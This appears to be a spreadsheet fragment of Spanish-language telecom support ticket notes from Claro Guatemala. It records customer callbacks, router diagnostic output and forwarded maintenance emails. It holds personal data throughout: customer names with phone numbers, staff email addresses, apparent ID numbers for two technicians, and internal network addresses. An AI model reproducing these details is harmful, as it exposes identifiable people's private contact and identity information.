    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. SE VERIFICA QUE EL SERVICIO SE ENCUENTRA ACTIVO.
2001443094
COLA:
NOMBRE: A: 0050325255800
NÚMERO: 0050325255800
DURACIÓN: 0:00:56
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050325255800
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 16:27:34</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MIGUEL GIL PERO LA LLAMADA NO COMPLETA.
2001436152
COLA:
NOMBRE: A: 0050377866494
NÚMERO: 0050377866494
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 0050377866494
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 16:03:59</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO FIJO AL CLIENTE MIGUEL GIL, LO ESTAN BUSCANDO.
2001436708
COLA:
NOMBRE: A: 0050322432392
NÚMERO: 0050322432392
DURACIÓN: 0:00:28
ESTADO: CONECTADA
DETALLES: 0050322432392
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 16:05:57</t>
  </si>
  <si>
    <t>F4578373</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA ANTONIA LEMUS 57492922 MENCIONA QUE NO PUEDEN COBRAR CON EL POS POR LO QUE SOLICITA SE PUEDA VALIDAR
-ID 2001434728</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA ANTONIA LEMUS 57492922 SE LE BRINDA EL DIAGNOSTICO Y MENCIONA QUE ESTARA ESCALANDO EL INCONVENIENTE CON SU IT
-ID 2001456164</t>
  </si>
  <si>
    <t>F4578376</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAVIER RUANO 55173525 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001440277</t>
  </si>
  <si>
    <t>F4578385</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON EVELIN VILLAFUENTE/PR 40049654 INDICA QUE ENLACE HA ESTADO DEMASIADO INESTABLE TODO EL DÍA, SE RETIRA EN UNA HORA, MAÑANA INICIAN LABORES A LAS 07:00AM. SE LLAMÓ A CENTRAL 24178700 EXT 3158 PARA VALIDAR LO DICHO POR PR, OPERADORA AUTOMÁTICA INDICA QUE ATIENDEN DE 07:00AM A 15:00 HORAS.</t>
  </si>
  <si>
    <t>F4578391</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TAMARA MARTINEZ 77495068 PARA CONSULTAR EL INCONVENIENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4578427</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILDER CASTRO 77217949 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001445522</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE PIDE SE LE LLAME A LAS 16:00 HORA SEGUIMIENTO Y/O VALIDAR SERVICIO.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE NO HA TENIDO CAIDAS  DESDE HACE 1 HORA- INDICA QUE LLAMARA CUANDO PRESENTE ALGUNA EVENTUALIDAD ADICIONAL SOLICITA LLAMADA A LAS 4 PM-
CC_WAY_GT_SANTIAGO_ATITLAN_110#SH LO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0 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:02.399: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*MAY 18 23:02:10.127: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 18 23:02:21.119: %CTS-6-ENV_DATA_START_STATE: ENVIRONMENT DATA DOWNLOAD IN START STATE
*MAY 18 23:02:27.151: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 18 23:02:27.151: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 18 23:02:28.075: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 18 23:02:28.151: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 18 23:02:28.151: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 18 23:02:32.275: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 18 23:02:34.791 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 18 23:02:35.599 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 18 23:02:36.695 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 18 23:02:36.699 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 18 23:02:37.727 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 18 23:02:37.727 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
*MAY 18 23:02:38.043 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 18 23:02:38.043 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/1, CHANGED STATE TO DOWN
*MAY 18 23:02:38.043 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO DOWN
*MAY 18 23:02:38.043 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/3, CHANGED STATE TO DOWN
*MAY 18 23:02:38.767 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 12:31 BY PROD_REL_TEAM
*MAY 18 23:02:38.767 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_WAY_GT_SANTIAGO_ATITLAN_110 IS UNDERGOING A COLD START
*MAY 18 23:02:41.387 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO UP
*MAY 18 23:02:41.423 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 18 23:02:42.387 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/2, CHANGED STATE TO UP
*MAY 18 23:02:42.423 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 18 23:03:10.407 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 22 15:09:24.358 UTC: %DHCPD-4-PING_CONFLICT: DHCP ADDRESS CONFLICT:  SERVER PINGED 192.168.81.9.
CC_WAY_GT_SANTIAGO_ATITLAN_110#    SH CLOCK
*20:53:31.676 UTC THU MAY 26 2022
CC_WAY_GT_SANTIAGO_ATITLAN_110#SH VER | IN UPTIME
CC_WAY_GT_SANTIAGO_ATITLAN_110 UPTIME IS 1 WEEK, 21 HOURS, 51 MINUTES
CC_WAY_GT_SANTIAGO_ATITLAN_110#PING 1.1.1.1 SO</t>
  </si>
  <si>
    <t>F4578438</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROBERT DUEÑAS AL 25148976 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001397749
**</t>
  </si>
  <si>
    <t>F4578443</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE SR. TREJO 31480190 MENCIONA QUE APLICO REINICIO A LOS EQUIPOS INTERNOS Y YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001427431</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE R. TREJO 31480190 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 2001420952</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE SR. TREJO 31480190 MENCIONA QUE EL INCONVENIENTE PERSISTE, SE LE INDICA QUE EL SERVICIO A NIVEL DE CLARO ESTA FUNCIONANDO CORRECTAMENTE
SE LE HACE MENCION A CLIENTE QUE NO SE OBSERVAN EQUIPOS ASOCIADOS, INDICA QUE IRA A PR A VALIDAR POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001403369</t>
  </si>
  <si>
    <t>F4578457</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS PARA MAÑANA VIERNES A LAS 8 HRS || PENDIENTE CONFIRMACIÓN
ASUNTO: RE: SEGUIMIENTO SD 1129401
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS INNOVA.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 863400372T || UBICACIÓN; RENAP_1RA. CALLE 5-68 ZONA 1, SAN FRANCISCO EL ALTO, TOTONICAPÁN. SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA PERSONAL TÉCNICO QUE ESTARÁ ATENDIENDO LA VISITA EL DÍA DE MAÑANA VIERNES 27/05 A PARTIR DE LAS 8:00 HRS.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.
JUAN FRANCISCO REYES RUIZ 715730 1787 42473 0909
DIEGO ALVAREZ 517470 1887 70992 0901
QUEDAMOS ATENTOS A SU CONFIRMACIÓN.
SALUDOS CORDIALE</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN CHACON 23049696  RESPONDE ESTEBAN PARA BRINDAR RETROALIMENTACION
-ID 2001498449</t>
  </si>
  <si>
    <t>ENLACE SE ENCUENTRA ESTABLE  EN NODO SE ENCUENTRAN CABLES DE ENERGIA Y ETH  FLOJOS EN EQUIPO ASMI, SE CONECTAN CORRECTAMENTE Y RESTABLECE SERVICIO
&lt;QTZLGTLFN1D1E04A02EIM2&gt;PING -C 1500 -M 30 -B  -VPN-INSTANCE INNOVA_DATOS 10.174.189.66
  PING 10.174.189.66: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.174.189.66 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/58 MS
&lt;QTZLGTLFN1D1E04A02EIM2&gt;</t>
  </si>
  <si>
    <t>TECNICOS EN CAMINO DE CLIENTE SE ENCONTRABAN DISTANTES ESTIMADO PARA LLEGAR 1.5 HORAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PARA SOLICITARLE CONTACTO DE PR Y REALIZAR PRUEBAS PERO NO RESPONDE. OPERADORA DEJA EN ESPERA---</t>
  </si>
  <si>
    <t>VISITA PARA MAÑANA VIERNES 8 HRS
CLIENTE AUTORIZA ACCESOS
SOPORTE INNOVA TELECOMUNICACIONES &lt;SOPORTE@INNOVATELCO.NET&gt;
ASUNTO: SEGUIMIENTO SD 1129401
BUENA TARDE.
GRACIAS POR LA INFORMACIÓN, PUEDEN PROCEDER A LA VISITA, YA SE NOTIFICÓ Y AUTORIZO EL ACCESO DEL PERSONAL.
SALUDOS.</t>
  </si>
  <si>
    <t>F4578459</t>
  </si>
  <si>
    <t>SE CONTACTA LUDWIN OCHOA DEL 31435695 ID  2001427297 PARA EL SEGUIMIENTO DE SU SD1129382 DONDE SOLICITA A QUE HORA SE LE VISITARA, SE LE COMENTA QUE NO ES VISITA Y SE LE BRINDA LA INFORMACIÓN DE COMO SE REALIZA EL PROCESO DE APOYO Y RESOLUCIÓN Y AL VALIDAR QUE CONTINUA CON LA AFECTACIÓN Y NO HAY MOVIMIENTO DE TICKET SE TRANSFIERE CON EL GESTOR  DARWINH.ESPANA AL 8126 2001428871 ATIENDE Y SE LE BRINDA LA INFORMACIÓN CONTACTA AL GESTOR Y LO TRANSFIERE SE LE BRINDA LA INFORMACIÓN AL GESTOR Y SE DEJA CON EL PR EN LINEA PARA LAS PRUEBAS</t>
  </si>
  <si>
    <t>F4578464</t>
  </si>
  <si>
    <t>SR. ALEX PONZ AL 79560202 SE LE INFORMA QUE TIENE QUE REVISAR SUS EQUIPOS INTERNOS, YA QUE A NIVEL DE CLARO ENLACE CONTINUA OPERATIVO Y ESTABLE, ADICIONAL PARA CONFIRMAR ENLACE CONECTO UNA PC AL ROUTER CISCO, Y VALIDO QUE SI HAY SERVICIO DE INTERNET, VALIDA AUTORIZA EL CIERRE.
ID_397600001_LA_MONTANA_CYRSA#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.191.217           1   8CFD.18AA.698B  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.191.218           -   6C8B.D314.C680  ARPA   GIGABITETHERNET0/0/0
INTERNET  186.151.201.49          -   6C8B.D314.C681  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.151.201.50          0   54EE.75BD.C218  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.151.201.51          0   INCOMPLETE      ARPA
INTERNET  186.151.201.53          0   INCOMPLETE      ARPA
INTERNET  186.151.201.54          0   INCOMPLETE      ARPA
ID_397600001_LA_MONTANA_CYRSA#!!
54EE.75BD.C218
WISTRON INFOCOMM(KUNSHAN)CO.,LTD.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX PONZ AL 79560202 INDICA QUE AUN NO CUENTA CON SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001396573
**</t>
  </si>
  <si>
    <t>F4578478</t>
  </si>
  <si>
    <t>DE: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 29 DE MAYO DE 2022 14:28
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT &lt;CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: F4578478 || 7800520T || CC_GYT_GT_INTERNET_AGENCIA_011
BUENA TARDE ESTIMADOS.
UN GUSTO SALUDARLOS, QUEDAMOS ATENTOS A SUS COMENTARIOS PARA PROGRAMAR LA VENTANA DE MANTENIMIENTO PARA LA CERTIFICACIÓN DEL MEDIO, CUALQUIER CONSULTA ADICIONAL ESTAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>TECNICO SE ENCUENTRA EN INSTALACIONES DE CLIENTE A ESPERA QUE LE DEN ACCESOS A LA AZOTEA</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22861708 RESPONDE CESAR MENCIONA QUE SI PUEDE ESPERAR HASTA LAS 19:00 HRS PERO SOLICITA QUE ESTA INFORMACION ESTE AUTORIZADA POR LA CENTRAL Y PERSONAL DE SEGURIDAD
CLIENTE SOLICITA SE ENVIE LA SOLICITUD DE LA VISITA PARA LAS 19:00 HRS A LA CENTRAL Y QUE PUEDAN AUTORIZAR PARA INGRESAR A LA AZOTEA
-ID 1001049991</t>
  </si>
  <si>
    <t>CLIENTE NO PERMITE QUE SE REALCEN CAMBIOS EN EL SERVICIO O QUE SE REALIZAN PRUEBAS YA QUE ESTAN EN TEMPORADA ALTA SEGUN ENCARGADO DE SUCURSAL POR LO QUE PIDEN QUE SE REALIZE LA VISITA  ALAS 19 HRS E DIA DE HOY .</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREO CLIENTE GESTIONANDO PARA PROGRAMAR VENTANA DE MANTENIMIENTO
DE: GERSON GIRÓN &lt;GGIRON@GTC.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 10:18
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; ASI TELECOMUNICACIONES Y SEGURIDAD &lt;TSEGURIDAD@GTC.COM.GT&gt;
CC: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT &lt;CCTELECOMUNICACIONES@GYTCONTINENTAL.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; INCIDENTES INFRAESTRUCTURA &lt;IPINFRA@GTC.COM.GT&gt;
ASUNTO: RE: F4578478 || 7800520T || CC_GYT_GT_INTERNET_AGENCIA_011
ESTIMADOS @ASI TELECOMUNICACIONES Y SEGURIDAD ¿SERÍAN TAN AMABLES DE PROGRAMAR LA VENTANA DE MANTENIMIENTO CON LOS SEÑORES DE CLARO?
GRACIAS DE ANTEMANO, SALUDOS.
EL DOM, 29 MAY 2022 A LA(S) 14:29, LESTER LEONEL RODAS MARROQUIN (LESTERL.RODAS@CLARO.COM.GT) ESCRIBIÓ:
BUENA TARDE ESTIMADOS.
UN GUSTO SALUDARLOS, QUEDAMOS ATENTOS A SUS COMENTARIOS PARA PROGRAMAR LA VENTANA DE MANTENIMIENTO PARA LA CERTIFICACIÓN DEL MEDIO, CUALQUIER CONSULTA ADICIONAL ESTAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4578480</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON KEVIN MANDANDI/CLIENTE 56417290 INDICA ENLACE OK DESDE HACE UNA HORA, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4578500</t>
  </si>
  <si>
    <t>DESPUES DEL RESET EN EL ATAE EL SERVICIO SIEMPRE QUEDO CRUZADO.
SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA. SE HABLO NUEVAMENTE CON EL CLIENTE BRYAN QUIEN INDICA QUE YA POSEE LLAMADAS SALIENTES.
2001407607
COLA:
NOMBRE: A: 0050324612400
NÚMERO: 0050324612400
DURACIÓN: 0:01:31
ESTADO: CONECTADA
DETALLES: 0050324612400
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 14:46:33</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE BRYAN RAMOS.
QUIEN INDICA QUE NO PUEDE SACAR LLAMADAS.
2001401548
COLA:
NOMBRE: A: 0050324612400
NÚMERO: 0050324612400
DURACIÓN: 0:00:40
ESTADO: CONECTADA
DETALLES: 0050324612400
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 26/05/2022 14:26:15</t>
  </si>
  <si>
    <t>F4578502</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE OTTO PUAQUE AL 30896590  INDICA QUE NO ESTA YA EN EL SITIO QUE SE LE LLAME MAÑANA A LAS 8:00 A 9:00 AM **
ID 2001446284
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OTTO PUAQUE AL 30896590 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001501377</t>
  </si>
  <si>
    <t>F4578521</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO WILLIAM UBICADO EN TICKETS ANTERIORES, NO TIENETONO LA LINEA.
2001436131
COLA:
NOMBRE: A: NICARAGUA
NÚMERO: 011 50558223754
DURACIÓN: 0:00:07
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA/404:SIP - NO SE ENCUENTRA]
DETALLES: +50558223754
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/05/2022 16:03:53</t>
  </si>
  <si>
    <t>F4578524</t>
  </si>
  <si>
    <t>SE GENERÓ LA FALLA MASIVA: F4578652 || CAÍDA TOTAL || ETX-1300 EL CENTRO CHO02 || 10.81.103.176 || MASIVO_HN ||</t>
  </si>
  <si>
    <t>F4578531</t>
  </si>
  <si>
    <t>##SE HA RECIBIDO LLAMADA DE CLIENTE SR CARTAGEA, INDICA QUE PROGRAMARA LA VISITA, POSIBLEMENTE A FINAL DE ESTA SEMANA POR LA TARDE Y QUE NOS RESPONDERA VIA CORREO ##VIVO</t>
  </si>
  <si>
    <t>ALEXANDER CARTAGENA-34224345   COMENTA QUE YA TODO OK + PIDE 2 CORREOS
1- DONDE SE LE OCMENTE LO REALIZADO EN LAS PRUEBAS DE HOY
2. DONDE SE LE INDIQUE LOQ UE SE REALIZO PARA SOLVENTARLO + CONSULTARLE POR ESE MEDIO S VALIDA##VIVO</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE, DONDE PIDE CONFIRMAR EL SERVICIO  A ALEXANDER CARTAGENA 34224345  (GUATEMALA) ##A LA ESPERA DE CONFIRMACION
DE: APMM.DCSC@ORANGE.COM &lt;APMM.DCSC@ORANGE.COM&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 15:16
PARA: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; HUGO JOSE SOTO SAMAYOA &lt;HUGO.SOTO@CLARO.COM.GT&gt;; SOFIA ANDREA MAYEN RIVAS &lt;SOFIA.MAYEN@CLARO.COM.GT&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; ZZZ ECS APMM DCSC &lt;APMM.DCSC@ORANGE.COM&gt;
ASUNTO: RE: PTT// 2205Q20599 // APMM REF: INC5133473 // PTT TICKET SD1126903
HELLO ALEXANDER ,
KINDLY CHECK NOW AS ISSUE SUPPOSED TO BE RESOLVED .
REGARDS,
MINA NABIH
CUSTOMER SERVICE &amp; OPERATIONS
TECHNICAL SUPPORT ENGINEER
PHONE:   + 44 207 335 0103  (US TOLL-FREE, 800 848 5941)
CITY STARS TOWER 8 FLOOR 9 OMAR EBN EL KHATAB STREET HELIOPOLIS 11771 CAIRO EGYPT
MINA.NABIH@ORANGE.COM
WWW.ORANGE-BUSINESS.COM</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DEL CLIENTE### SE PROCEDE AL CIERRE##
ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;
IN FACT, THE PROBLEM IS ALREADY FULLY RESOLVED MINA, BY THE WAY, YOU CAN CLOSE THE TICKET NOW. I APPRECIATE EVERYONE'S HELP, IT WAS A GREAT PLEASURE MEETING YOU AND CHATTING WITH EVERYONE.
BEST REGARDS
ALEXANDER CARTAGENA
IT SUPPORT TECHNICIAN ¿ GUATEMALA
MAERSK TECHNOLOGY - END-USER SUPPORT &amp; ENABLEMENT
PHONE: +502 3422-4345
EMAIL: ALEXANDER.CARTAGENA@MAERSK.COM</t>
  </si>
  <si>
    <t>CLIENTE CONFIRMA PERMISOS-  Y SE CONTESTA- ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 16:04
PARA: ALEXANDER CARTAGENA &lt;ALEXANDER.CARTAGENA@MAERSK.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; APMM.DCSC &lt;APMM.DCSC@ORANGE.COM&gt;; N&amp;EV - MYPHONE L1 &lt;NEV-MYPHONEL1@MAERSK.COM&gt;; +D N&amp;EV MYPHONE LEADS &lt;DNTMYPHONELEADS@MAERSK.COM&gt;; ESVIN ANTONIO PAREDES SAMUY &lt;ESVIN.PAREDES@CLARO.COM.GT&gt;; RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;
